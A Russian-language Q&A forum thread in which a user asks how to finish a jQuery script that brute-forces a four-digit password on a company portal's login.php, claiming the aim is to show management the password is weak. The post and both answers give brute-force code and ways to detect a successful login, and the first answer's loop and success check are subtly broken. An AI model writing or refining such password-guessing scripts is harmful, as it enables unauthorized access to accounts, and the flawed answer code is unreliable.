@whitemask

Как найти на странице input:password если страница подгружается через Ajax?

Доброго дня! У меня есть задача подобрать пароль на внутреннем портале компании, чтобы убедить руководство в том что четырехзначный пароль это плохо!) Я написал простенький JS (Я новичок в JS)

var i = 6490;
var password = 1751;

    var timer = setInterval(function() {
        if(i < 6491) {
			
			
			
			$.ajax({
                  url: "login.php",
                  type: "POST",
                  data: {'password': password},
				  success: function(data) {
					alert(data);
					}
			});
			
			password++;
			i++;
        } else {
            clearInterval(timer);
        }
    }, 1000);


Пароль от портала: 1751. Когда пароль верный мне возвращается другая страница с новостями. Я хочу сделать сравнение кода, если пароль не верный то мне возвращаеться страница с вводом пароля где есть input type="password". Как мне сделать сравнение, если в возвращенных data нет input, чтобы скрипт остановился. Как мне найти значение data и сравнить его?

P.S. Когда пароль верный я получаю полный код страницы, но из-за того что не сравнения, скрипт работает дальше и код удаляется! cookie не сохраняет!
  • Вопрос задан
  • 258 просмотров
Пригласить эксперта
Ответы на вопрос 2
PretorDH
@PretorDH
HTML5, CSS3, PHP, JS - люблю в чистом виде.
var i = 6490,
     password = 1751,
     success = false,
     aclp = {
                  url: "login.php",
                  type: "POST",
                  data: {'password': password},
          success: function(data) {
               if ( data.match(/input type="password"/gi) ) return success = true;     /* проверяем*/
               password++;
               i++;
               acl();
          } 
     }; 

function acl () {
      $.ajax(aclp);
};
Ответ написан
Комментировать
@entermix
if(false !== data.indexOf('input type="password"')) {
// Не авторизованы
}
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы